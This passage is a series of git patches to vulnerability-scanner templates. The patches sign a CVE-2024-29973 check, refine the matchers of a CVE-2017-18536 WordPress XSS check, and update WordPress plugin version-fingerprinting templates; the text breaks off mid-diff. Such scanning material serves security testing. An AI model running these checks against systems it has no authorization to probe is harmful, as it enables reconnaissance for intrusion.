2024 13:30:58 +0000 Subject: [PATCH 0421/1841] Auto Template Signing [Wed Jun 19 13:30:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-29973.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index 94e18cbc27..1be2c63301 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -49,3 +49,4 @@ http: - "contains(header, 'application/json')" - "contains(body, '{{string}}')" condition: and +# digest: 490a00463044022049181be120d1349aec1b0334e173bea723ccde8f661094dd301df6a3934e0cce022047da4d0360d5e747e56c1bf4518b1de78d04716a4170e162b3f5c2d65f5df088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dd3c7c199769352018f8d8f20bbf0762842c121a Mon Sep 17 00:00:00 2001 From: Kristinn Vikar Date: Wed, 19 Jun 2024 16:25:06 +0000 Subject: [PATCH 0422/1841] Fix CVE-2017-18536 False Positives --- http/cves/2017/CVE-2017-18536.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index a44a70c343..0fd2965ec5 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -36,6 +36,11 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "number in author name not allowed" + - type: word part: body words: From c4ccac80f27afa8be94f3904fc21222a0f78f648 Mon Sep 17 00:00:00 2001 From: Kristinn Vikar Date: Wed, 19 Jun 2024 16:36:43 +0000 Subject: [PATCH 0423/1841] update matcher to be more specific + remediation slightly altered --- http/cves/2017/CVE-2017-18536.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 0fd2965ec5..e39b79d433 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -8,7 +8,7 @@ info: impact: | This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website. remediation: | - Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. + Update to the latest version of the WordPress Stop User Enumeration plugin or apply the provided patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - https://wordpress.org/plugins/stop-user-enumeration/#developers @@ -39,7 +39,7 @@ http: - type: word part: body words: - - "number in author name not allowed" + - "forbidden - number in author name not allowed =" - type: word part: body From aae9b3d2afafae734ea4d60b05ca15ff260dd423 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 00:18:50 +0000 Subject: [PATCH 0424/1841] Auto WordPress Plugins Update [Thu Jun 20 00:18:50 UTC 2024] :robot: --- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/better-wp-security.txt | 2 +- helpers/wordpress/plugins/disable-gutenberg.txt | 2 +- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- .../plugins/woocommerce-pdf-invoices-packing-slips.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 9 insertions(+), 203 deletions(-) diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 99eba4de93..2582dddfd5 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.0 \ No newline at end of file +4.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index 0d01372d43..a44384c044 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -9.3.2 \ No newline at end of file +9.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt index 50e47c89ca..6ebad14888 100644 --- a/helpers/wordpress/plugins/disable-gutenberg.txt +++ b/helpers/wordpress/plugins/disable-gutenberg.txt @@ -1 +1 @@ -3.1.1 \ No newline at end of file +3.1.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index ceaae09796..2e11d54366 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.10 \ No newline at end of file +6.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index b9d0c00afc..a9fa640623 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.129.0 \ No newline at end of file +1.129.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index fbafd6b600..e2bdf6e45a 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.7.2 \ No newline at end of file +2.7.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index d21b198c83..9fdf3baef9 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.7.0 \ No newline at end of file +7.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index dcd32c18ae..8a8c005df7 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.8.3 \ No newline at end of file +3.8.4 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 8d3d502ef0..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079dcbc17815262aa4206c5bb973dbb5b81633827103f4ccbcfea402aea1e535302201bbdacfb6d5fd24cccadb80ccfae30e9a078d88e1bf1ac4da4d0e706dbfaea1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 5f1d0ac581..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f397d01e93553e3da296106eb315f0adee57bc8cf8b765c9e1e955690462bf05022056e16ca433593f00465cce5ed98d3ef99deda0d0a611fdeb51bfd9774296222b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4bfcc2d24e..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca2094ed1472ce80c492e08abcf5a3d28805444bea60baf1d6bae117775790f4022100badd6854ac2b69e53ae21deccbbe6d55f1186f393c026259e5daa93766b65ed5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 0950761fa3..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9f57b3d631c508fb7675c1b1a2fe902d1688fcf047719e38b894ec548a6ad9702205858172248663f0bc86a2618453c3f0359037ac1e1a75f02f4215d95dd36718c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 12dab0df7e..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dead1b6e453b7b06972fd992233cc6a12c884489fd3fa74a6cf68f2187d7c440221009100a70b38941758ee6377b0acb20989be8c6f2853e118760b9cf78138bccc54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 5aa0805163..196cc7e8e8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205faf5d077dd41d8438ac1a2aeb76934896193ac47e5a1f77c8b13e17afdf8b1c02204804ab4267b004cc349f7265318e753c461ad52c61810ccbdcebac27e742b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index db64c2b890..55362630df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1421aab4518956b16ad35036f6f5fb80aacfc1c84d64a7c9a97d3a84c01bb3602202fb0deee560a02d9f94df3441af0fd706ae83943683ab2a0fbacdb52a068feea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8f33a47613..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202045a4378058cadd5d353fcf1003d1c16e9318e83d42a85b2c5e48abc3ae9c57022006c27e0a6da8c4b92e5176c6611adaff32eb4c1158c8d9a9f810d4bc397101ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 3dc91846ef..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3cf67425fd4769df098e3ddd61b94125e77776e274be2e9954dfd806f5acdc9022059c9c4667f0f0d30ea9deba1ac5196bc89adc50ea0558198f021d180a46630ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index eb982fd10b..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7fbc1d6b8c06594855d2c8c02afac131e7c8cec38c4c1dc4ca51965cc7b5a4f0220451988857f866cfa4d64843a4ec07a84085bd30eea88743f2658f4ac81937570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 87db9714b7..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a93677e5d006208589112b3ecdd20d97b05ab52c1be868a99d438c920fa3e42022100918d596bb1f1f78ff409022f0eed79f1df185eefa1a41bb049bf66285be411bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index f322d3d948..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cfb36bfed069943b25ec7d7c9c918e4bfca092fba29e4a505ef26e6c92f1bc5f022100e30019d688e9385b68943f690594d9fe8e460f9bb82a70d35879f8d2daee7a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 6b19b81139..f76b750bf6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -1,7 +1,7 @@ id: wordpress-backwpup info: - name: BackWPup – WordPress Backup Plugin Detection + name: BackWPup – WordPress Backup Plugin | Easy Backup & Restore Detection author: ricardomaia severity: info reference: @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5e01596e86b560a554577a5f77219aa879f02e706b6216bae729c1dfe6ffaa8022100bcecebecf396bf8e9f4c37fcc1703b2220e8bb4e570599a597452f68045b2736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 9ed9e1d735..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d64272207f20df90b1b5527d383f161bae2a5a675e234588d16d25c3109ef253022100ca7150b88319ab8f8f42e4b51ad7e5ab5d2a2923ec3142693c60f49395e4b6fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index e2298b375d..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220096cbef873dba28aa7a29fe16c79565b6fc3e6fefe3633e29c55ef2afe336460022100ae843aa44960896734aee0e8e12da102a28de9f74a6cfde126fce14948bfb85d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a164c5431f..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202eab4f6afb9490f66e61f4577959be441cb69e83729b8f8baedbdfa013341448022100cf91a939bed4c5bfe5989c78dae45c2faedc0fa52d7bee368116817f6c6fa912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 8d5796ffc5..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d4b8fdffb5caa42dbceb59a680e1103e58eaff3c693cf16f05780242d40af8c30220642c0f133ad22f84d2478547f0b82c3cba93d7d240a177a6f34dc00611b6fc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index efeb6fec1b..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067789da1b92b738b66b84666b0c9e56ff30df348ad6b9832394e8122abb39e33022068489cda11d7bee8536d9054e9f6b8499a9579ca80d82c005fbca43e5e58861e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index c9b9b3a646..f3aae5f624 100644 --- 